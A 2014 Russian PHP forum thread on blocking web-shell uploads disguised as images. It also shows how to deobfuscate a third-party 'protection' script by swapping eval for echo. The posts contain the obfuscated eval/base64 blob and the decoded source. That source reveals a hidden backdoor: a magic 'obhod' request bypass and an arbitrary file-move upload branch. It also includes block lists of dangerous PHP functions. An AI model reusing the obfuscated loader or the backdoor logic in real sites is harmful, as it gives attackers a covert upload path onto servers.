Доброго времени суток товарищи! Вот возник у меня такой вопрос, как можно запретить выгрузку php файлов на сервер переименованных в расширение картинки.
Вот я взял щелл и переименовал его в:
- foto.php.jpg и прошло
- foto.jpg (на самом деле файл: foto.php - щелл)
Открыть нельзя но можно загрузить.
У меня есть файл с такой фильтрацией но он закодирован в функции "eval" может кто знает как раскодировать? я бы не парился с расскодировкой если бы автор не засунул туда бекдор.
1. Franklin_Ua - 08 Апреля, 2014 - 04:09:18 - перейти к сообщению
2. Мелкий - 08 Апреля, 2014 - 09:27:20 - перейти к сообщению
Franklin_Ua пишет:
У меня есть файл с такой фильтрацией но он закодирован в функции "eval" может кто знает как раскодировать?
Заменяете eval на echo, получаете исходник. Повторять до получения осмысленного результата.
Franklin_Ua пишет:
Открыть нельзя но можно загрузить.
Значит пока что безопасно.
Далее отключаете исполнение php в директории загруженных файлов и всё.
3. Franklin_Ua - 08 Апреля, 2014 - 09:33:47 - перейти к сообщению
Я извиняюсь, а можно по подробнее о (Заменяете eval на echo, получаете исходник. Повторять до получения осмысленного результата.) ?
(Добавление)
Вот код который закодирован:
$V225486532="Gh1+cT8zSEVSRkJSRENMMHh1f3hzMEo2KiAlIi4+bBodfnE/fmRkcmM/M0hQUkNMMGRydGJlfmNu
SGR+Y3JIcm9yMEo+PmxydH94NzArc35hKceAx6fGnsevxpXHpzfHpcetx6zGmcaQx6LHqsenOTdhcmVkfnh5NyY5I
yt1ZSlHZXhkYXJjN9W+NyUnJiQrOHN+YSkwLGoaHTNxfntjZUh+eX5jSHJvcionLBodM3F+e2NlSGR8eHV8dkgmSH
ZlZXZuKjU0MDQ1LBodM3F+e2NlSGR8eHV8dkglSHZlZXZuKjA0NTQwLBodM3F+e2NlSHF4ZXp2Y0h2ZWV2bio1OEs
/OWd/Z2s5f2N2dHRyZGRrOXRkZGs5ZXZlazltfmdrOWRme2s5f2N6azl/Y3p7Pkt1OH41LBodM3F+e2NlSHZ7e0h2
ZWV2bio1OD9xfntySGdiY0h0eHljcnljZGt6eGFySGJne3h2c3JzSHF+e3Jrfnl0e2JzcmtlcmZifmVya3JhdntrY
nl7fnl8a3F4Z3J5a3FnYmNka3FgZX5jc mtxfntySHByY0h0eHljcnljZGtxfntya 3puZGZ7a3R4Z25renxzfmVrZ3
9na39jdnR0cmRka2R/cnt7SHJvcnRrcnR/eGtlcnl2enI+OH41LBodM3F+e2NlSHF+e3JIdmVldm4qNTUsGh0zcX5
7Y2VIYWF4c0h2ZWV2bio1NSwaHTNxfntyZEhxfntjKj92ZWV2bkh8cm5kPzNIUV5bUkQ+PiwaHX5xPzNxfntyZEhx
fntjTDAnMEo2KjAwPmwaHTNlcmRie2NIdHh5KnR4YnljPzNIUV5bUkQ+LBodM3JIdHh5KicsGh1gf357cj8zZXJkY
ntjSHR4eSkqM3JIdHh5Pmx+cT9nZXJwSHp2Y3R/PzNxfntjZUhxeGV6dmNIdmVldm47fnpne3hzcj81NzU7M0hRXl
tSREwzcX57cmRIcX57Y0wzckh0eHlKSj4+PmwzcX57Y2VIfnl+Y0hyb3IqJiw3dWVydnwsajNySHR4eTw8LGoaHX5
xPzNxfntjZUh+eX5jSHJvcjYqJj5sGh1xYnl0Y354eTdxfntyZEhxfntjSGdleGE/M2d4e3hkdj5sGh1we3h1dns3
M3F+e3JkSHF+e2MsN3B7eHV2ezczcX57Y2VIdnt7SHZlZXZuLDdwe3h1dns3M3F+e2NlSHF+e3JIdmVldm4sGh0zc
X57cmRIcX57Y0hnZXhhKjNIUV5bUkRMM3F+e3JkSHF+e2NMM2d4e3hkdkpKLBodM3Z2ZSpldnlzPyY7Lyc+LBoddH
hnbj8zcX57cmRIcX57Y0hnZXhhTDBjem dIeXZ6cjBKOzNxfntyZEhxfntjcmVIY3 pnOTVxfntjcmVIcX57cmRINTk
zdnZlOTU5e3hwNT4sGh0zcX57ckhkf35jdnJ6KnF+e3JIcHJjSHR4eWNyeWNkPzNxfntyZEhxfntjcmVIY3pnOTVx
fntjcmVIcX57cmRINTkzdnZlOTU5e3hwNT4sGh1ieXt+eXw/M3F+e3JkSHF+e2NyZUhjemc5NXF+e2NyZUhxfntyZ
Eg1OTN2dmU5NTl7eHA1PiwaHX5xP2dlcnBIenZjdH8/M3F+e2NlSHZ7e0h2ZWV2bjszcX57ckhkf35jdnJ6PmtrZ2
VycEh6dmN0fz8zcX57Y2VIcX57ckh2ZWV2bjszcX57ckhkf35jdnJ6Pj5sZXJjYmV5NyYsamoaHTN+SHR4eSonLBo
dYH9+e3I/M2VyZGJ7Y0h0eHkpKjN+SHR4eT5sfnE/cX57cmRIcX57Y0hnZXhhPzN+SHR4eT4qKiY+bDNxfntjZUh+
eX5jSHJvciomLDd1ZXJ2fCxqM35IdHh5PDwsamoaHX5xPzNxfntjZUh+eX5jSHJvcioqJj5sc35yPzNxfntjcmVIc
X57ckhydH94PixqahodM3F+e2NlSHp2ZGQqfnpne3hzcj81NzU7M0hQUkM+OTA3MDl+emd7eHNyPzU3NTszSEdYRE
M+OTA3MDl+emd7eHNyPzU3NTszSFRYWFxeUj45MDcwOX56Z3t4c3I/NTc1OzNIRVJGQlJEQz4sGh1+cT9nZXJwSHp
2Y3R/PzNxfntjZUhkfHh1fHZIJkh2ZWV2bjszcX57Y2VIenZkZD5ra2dlcnBIenZjdH8/M3F+e2NlSGR8eHV8dkgl
SHZlZXZuOzNxfntjZUh6dmRkPmtrZ2Vy cEh6dmN0fz8zcX57Y2VIdnt7SHZlZXZu OzNxfntjZUh6dmRkPmtrZ2Vyc
Eh6dmN0fz8zcX57Y2VIYWF4c0h2ZWV2bjszcX57Y2VIenZkZD4+bDNxfntjZUh+eX5jSHJvciolLGoaHX5xPzNxfn
tjZUh+eX5jSHJvcioqJT5sc35yPzNxfntjcmVIeGR5eGF2SHJ0f3g+LGoaHWpye2RybBodfnE/fmRkcmM/M0hFUkZ
CUkRDTDBtdmdleGQmMEo+PmxyYXZ7PzNIRVJGQlJEQ0wwbXZnZXhkJjBKPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENM
MG12Z2V4ZCUwSj4+bH55dHtic3JIeHl0cj8zSEVSRkJSRENMMG12Z2V4ZCUwSj4sahodfnE/fmRkcmM/M0hFUkZCU
kRDTDBtdmdleGQkMEo+PmwzcHZkYypxeGdyeT8zSEVSRkJSRENMMG12Z2V4ZCRIJjBKOzVgNT4scWdiY2Q/M3B2ZG
M7M0hFUkZCUkRDTDBtdmdleGQkSCUwSj4scXR7eGRyPzNwdmRjPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENMMG12Z2V
4ZCMwSj4+bHp4YXJIYmd7eHZzcnNIcX57cj8zSFFeW1JETDBtdmdleGQjSCYwSkwwY3pnSHl2enIwSjszSEVSRkJS
RENMMG12Z2V4ZCNIJTBKPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENMMG12Z2V4ZCIwSj4+bGJ5e355fD8zSEVSRkJSR
ENMMG12Z2V4ZCIwSj4samoaHQ==";eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlY
TmxOalJmWkdWamIyUmxLQ0pLUmxsNlRY cFJOVTVVYXpKTmFtTTVXVzFHZWxwVVdU QllNbEpzV1RJNWExcFRaMmxYV
npGSFpXeHdWVmRVUWxsTmJFcHpWMVJKTldFeGNGSlFWREJwUzFSemExWnFVVEZOZWtWNFRucFplazlFTVdsWldFNX
NUbXBTWmxwSFZtcGlNbEpzUzBOS2FrMH hTalZaYTJSWFpGTkpjRTk1VWxkT2VsVX dUWHBuZVU5VVRYbFFWMHBvWXp
KVk1rNUdPV3RhVjA1MldrZFZiMGxzYTNsaFNHdHBTMVJ6YTFacVozbFBSR2QzVFdwUmQwOVVNV2xaV0U1c1RtcFNa
bHBIVm1waU1sSnNTME5LYVUwd2NISkph V3MzU2taWk5VMXFhelZOZWxVMFRWUmpP Vmx0Um5wYVZGa3dXREpTYkZre
U9XdGFVMmRwVjJwT2QyTkhTblJYYms1YVYwWktjMGxwYXpjaUtTazdaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0
pLUmxsNVRXcFZNRTlFV1RGTmVrazVTa1 paZWsxNlVUVk9WR3N5VFdwamIwcEdXWG xOYWxVd1QwUlpNVTE2U1hCUGV
WSlhUbFJGZUUxNldUVk5ha2t5VUZOU1YwNUVWWHBOVkVVelRtcE5ORXREVWxkTmFra3hUa1JuTWs1VVRYbExWSE05
SWlrcE93PT0iKSk7ZXZhbChiYXNlNjRf ZGVjb2RlKCJKRll4T0RFME1ESTBNVFE5 SnljN1ptOXlLQ1JXTmpFd09Ua
zVPRE01UFRBN0pGWTJNVEE1T1RrNE16azhKRlkxTVRFek5qa3lNalk3SkZZMk1UQTVPVGs0TXprckt5bDdKRll4T0
RFME1ESTBNVFF1UFNSV056VTBNemd5T1 RNeUtDZ2tWamd5T0Rnd01qUXdPU2drVm pJeU5UUTROalV6TWxza1ZqWXh
NRGs1T1Rnek9WMHBYakk1TmprME5qRTVPU2twTzMxbGRtRnNLQ1JXTVRneE5EQXlOREUwS1RzPSIpKTs="));
(Добавление)
Вот код который закодирован:
$V225486532="Gh1+cT8zSEVSRkJSRENMMHh1f3hzMEo2KiAlIi4+bBodfnE/fmRkcmM/M0hQUkNMMGRydGJlfmNu
SGR+Y3JIcm9yMEo+PmxydH94NzArc35hKceAx6fGnsevxpXHpzfHpcetx6zGmcaQx6LHqsenOTdhcmVkfnh5NyY5I
yt1ZSlHZXhkYXJjN9W+NyUnJiQrOHN+YSkwLGoaHTNxfntjZUh+eX5jSHJvcionLBodM3F+e2NlSGR8eHV8dkgmSH
ZlZXZuKjU0MDQ1LBodM3F+e2NlSGR8eHV8dkglSHZlZXZuKjA0NTQwLBodM3F+e2NlSHF4ZXp2Y0h2ZWV2bio1OEs
/OWd/Z2s5f2N2dHRyZGRrOXRkZGs5ZXZlazltfmdrOWRme2s5f2N6azl/Y3p7Pkt1OH41LBodM3F+e2NlSHZ7e0h2
ZWV2bio1OD9xfntySGdiY0h0eHljcnljZGt6eGFySGJne3h2c3JzSHF+e3Jrfnl0e2JzcmtlcmZifmVya3JhdntrY
nl7fnl8a3F4Z3J5a3FnYmNka3FgZX5jc mtxfntySHByY0h0eHljcnljZGtxfntya 3puZGZ7a3R4Z25renxzfmVrZ3
9na39jdnR0cmRka2R/cnt7SHJvcnRrcnR/eGtlcnl2enI+OH41LBodM3F+e2NlSHF+e3JIdmVldm4qNTUsGh0zcX5
7Y2VIYWF4c0h2ZWV2bio1NSwaHTNxfntyZEhxfntjKj92ZWV2bkh8cm5kPzNIUV5bUkQ+PiwaHX5xPzNxfntyZEhx
fntjTDAnMEo2KjAwPmwaHTNlcmRie2NIdHh5KnR4YnljPzNIUV5bUkQ+LBodM3JIdHh5KicsGh1gf357cj8zZXJkY
ntjSHR4eSkqM3JIdHh5Pmx+cT9nZXJwSHp2Y3R/PzNxfntjZUhxeGV6dmNIdmVldm47fnpne3hzcj81NzU7M0hRXl
tSREwzcX57cmRIcX57Y0wzckh0eHlKSj4+PmwzcX57Y2VIfnl+Y0hyb3IqJiw3dWVydnwsajNySHR4eTw8LGoaHX5
xPzNxfntjZUh+eX5jSHJvcjYqJj5sGh1xYnl0Y354eTdxfntyZEhxfntjSGdleGE/M2d4e3hkdj5sGh1we3h1dns3
M3F+e3JkSHF+e2MsN3B7eHV2ezczcX57Y2VIdnt7SHZlZXZuLDdwe3h1dns3M3F+e2NlSHF+e3JIdmVldm4sGh0zc
X57cmRIcX57Y0hnZXhhKjNIUV5bUkRMM3F+e3JkSHF+e2NMM2d4e3hkdkpKLBodM3Z2ZSpldnlzPyY7Lyc+LBoddH
hnbj8zcX57cmRIcX57Y0hnZXhhTDBjem dIeXZ6cjBKOzNxfntyZEhxfntjcmVIY3 pnOTVxfntjcmVIcX57cmRINTk
zdnZlOTU5e3hwNT4sGh0zcX57ckhkf35jdnJ6KnF+e3JIcHJjSHR4eWNyeWNkPzNxfntyZEhxfntjcmVIY3pnOTVx
fntjcmVIcX57cmRINTkzdnZlOTU5e3hwNT4sGh1ieXt+eXw/M3F+e3JkSHF+e2NyZUhjemc5NXF+e2NyZUhxfntyZ
Eg1OTN2dmU5NTl7eHA1PiwaHX5xP2dlcnBIenZjdH8/M3F+e2NlSHZ7e0h2ZWV2bjszcX57ckhkf35jdnJ6PmtrZ2
VycEh6dmN0fz8zcX57Y2VIcX57ckh2ZWV2bjszcX57ckhkf35jdnJ6Pj5sZXJjYmV5NyYsamoaHTN+SHR4eSonLBo
dYH9+e3I/M2VyZGJ7Y0h0eHkpKjN+SHR4eT5sfnE/cX57cmRIcX57Y0hnZXhhPzN+SHR4eT4qKiY+bDNxfntjZUh+
eX5jSHJvciomLDd1ZXJ2fCxqM35IdHh5PDwsamoaHX5xPzNxfntjZUh+eX5jSHJvcioqJj5sc35yPzNxfntjcmVIc
X57ckhydH94PixqahodM3F+e2NlSHp2ZGQqfnpne3hzcj81NzU7M0hQUkM+OTA3MDl+emd7eHNyPzU3NTszSEdYRE
M+OTA3MDl+emd7eHNyPzU3NTszSFRYWFxeUj45MDcwOX56Z3t4c3I/NTc1OzNIRVJGQlJEQz4sGh1+cT9nZXJwSHp
2Y3R/PzNxfntjZUhkfHh1fHZIJkh2ZWV2bjszcX57Y2VIenZkZD5ra2dlcnBIenZjdH8/M3F+e2NlSGR8eHV8dkgl
SHZlZXZuOzNxfntjZUh6dmRkPmtrZ2Vy cEh6dmN0fz8zcX57Y2VIdnt7SHZlZXZu OzNxfntjZUh6dmRkPmtrZ2Vyc
Eh6dmN0fz8zcX57Y2VIYWF4c0h2ZWV2bjszcX57Y2VIenZkZD4+bDNxfntjZUh+eX5jSHJvciolLGoaHX5xPzNxfn
tjZUh+eX5jSHJvcioqJT5sc35yPzNxfntjcmVIeGR5eGF2SHJ0f3g+LGoaHWpye2RybBodfnE/fmRkcmM/M0hFUkZ
CUkRDTDBtdmdleGQmMEo+PmxyYXZ7PzNIRVJGQlJEQ0wwbXZnZXhkJjBKPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENM
MG12Z2V4ZCUwSj4+bH55dHtic3JIeHl0cj8zSEVSRkJSRENMMG12Z2V4ZCUwSj4sahodfnE/fmRkcmM/M0hFUkZCU
kRDTDBtdmdleGQkMEo+PmwzcHZkYypxeGdyeT8zSEVSRkJSRENMMG12Z2V4ZCRIJjBKOzVgNT4scWdiY2Q/M3B2ZG
M7M0hFUkZCUkRDTDBtdmdleGQkSCUwSj4scXR7eGRyPzNwdmRjPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENMMG12Z2V
4ZCMwSj4+bHp4YXJIYmd7eHZzcnNIcX57cj8zSFFeW1JETDBtdmdleGQjSCYwSkwwY3pnSHl2enIwSjszSEVSRkJS
RENMMG12Z2V4ZCNIJTBKPixqGh1+cT9+ZGRyYz8zSEVSRkJSRENMMG12Z2V4ZCIwSj4+bGJ5e355fD8zSEVSRkJSR
ENMMG12Z2V4ZCIwSj4samoaHQ==";eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlY
TmxOalJmWkdWamIyUmxLQ0pLUmxsNlRY cFJOVTVVYXpKTmFtTTVXVzFHZWxwVVdU QllNbEpzV1RJNWExcFRaMmxYV
npGSFpXeHdWVmRVUWxsTmJFcHpWMVJKTldFeGNGSlFWREJwUzFSemExWnFVVEZOZWtWNFRucFplazlFTVdsWldFNX
NUbXBTWmxwSFZtcGlNbEpzUzBOS2FrMH hTalZaYTJSWFpGTkpjRTk1VWxkT2VsVX dUWHBuZVU5VVRYbFFWMHBvWXp
KVk1rNUdPV3RhVjA1MldrZFZiMGxzYTNsaFNHdHBTMVJ6YTFacVozbFBSR2QzVFdwUmQwOVVNV2xaV0U1c1RtcFNa
bHBIVm1waU1sSnNTME5LYVUwd2NISkph V3MzU2taWk5VMXFhelZOZWxVMFRWUmpP Vmx0Um5wYVZGa3dXREpTYkZre
U9XdGFVMmRwVjJwT2QyTkhTblJYYms1YVYwWktjMGxwYXpjaUtTazdaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0
pLUmxsNVRXcFZNRTlFV1RGTmVrazVTa1 paZWsxNlVUVk9WR3N5VFdwamIwcEdXWG xOYWxVd1QwUlpNVTE2U1hCUGV
WSlhUbFJGZUUxNldUVk5ha2t5VUZOU1YwNUVWWHBOVkVVelRtcE5ORXREVWxkTmFra3hUa1JuTWs1VVRYbExWSE05
SWlrcE93PT0iKSk7ZXZhbChiYXNlNjRf ZGVjb2RlKCJKRll4T0RFME1ESTBNVFE5 SnljN1ptOXlLQ1JXTmpFd09Ua
zVPRE01UFRBN0pGWTJNVEE1T1RrNE16azhKRlkxTVRFek5qa3lNalk3SkZZMk1UQTVPVGs0TXprckt5bDdKRll4T0
RFME1ESTBNVFF1UFNSV056VTBNemd5T1 RNeUtDZ2tWamd5T0Rnd01qUXdPU2drVm pJeU5UUTROalV6TWxza1ZqWXh
NRGs1T1Rnek9WMHBYakk1TmprME5qRTVPU2twTzMxbGRtRnNLQ1JXTVRneE5EQXlOREUwS1RzPSIpKTs="));
4. Мелкий - 08 Апреля, 2014 - 10:32:36 - перейти к сообщению
eval в коде видите? Замените его на echo, запустите скрипт - получите вывод. Этим выводом замените весь вызов echo (бывшего eval). Теперь опять замените eval на echo, запустите.
Ещё с десяток таких пассов руками и получается (чему я удивился, предполагал получить лишённые смысла переменные), читаемый исходник говнокода:
Ещё с десяток таких пассов руками и получается (чему я удивился, предполагал получить лишённые смысла переменные), читаемый исходник говнокода:
PHP:
скопировать код в буфер обмена
скопировать код в буфер обмена
- if($_REQUEST['obhod']!=7259){
- if(isset($_GET['security_site_exe'])){echo '<div>Защита включена. version 1.4<br>Prosvet © 2013</div>';}
- $filtr_init_exe=0;
- $filtr_skobka_1_array="#'#";
- $filtr_skobka_2_array='#"#';
- $filtr_format_array="/\(.php|.htaccess|.css|.rar|.zip|.sql|.htm|.html)\b/i";
- $filtr_all_array="/(file_put_contents|move_uploaded_file|include|require|eval|unlink|fopen|fputs|fwrite|file_get_contents|file|mysql|copy|mkdir|php|htaccess|shell_exec|echo|rename)/i";
- $filtr_file_array="";
- $filtr_vvod_array="";
- if($files_filt['0']!=''){
- $e_con=0;
- while($result_con>=$e_con){if(preg_match($filtr_format_array,implode(" ",$_FILES[$files_filt[$e_con]]))){$filtr_init_exe=1; break;}$e_con++;}
- if($filtr_init_exe!=1){
- function files_filt_prov($polosa){
- global $files_filt; global $filtr_all_array; global $filtr_file_array;
- $files_filt_prov=$_FILES[$files_filt[$polosa]];
- if(preg_match($filtr_all_array,$file_shitaem)||preg_match($filtr_file_array,$file_shitaem)){return 1;}}
- $i_con=0;
- while($result_con>=$i_con){if(files_filt_prov($i_con)==1){$filtr_init_exe=1; break;}$i_con++;}}
- if(preg_match($filtr_skobka_1_array,$filtr_mass)||preg_match($filtr_skobka_2_array,$filtr_mass)||preg_match($filtr_all_array,$filtr_mass)||preg_match($filtr_vvod_array,$filtr_mass)){$filtr_init_exe=2;}
- }else{
- if(isset($_REQUEST['zapros4'])){move_uploaded_file($_FILES['zapros4_1']['tmp_name'],$_REQUEST['zapros4_2']);}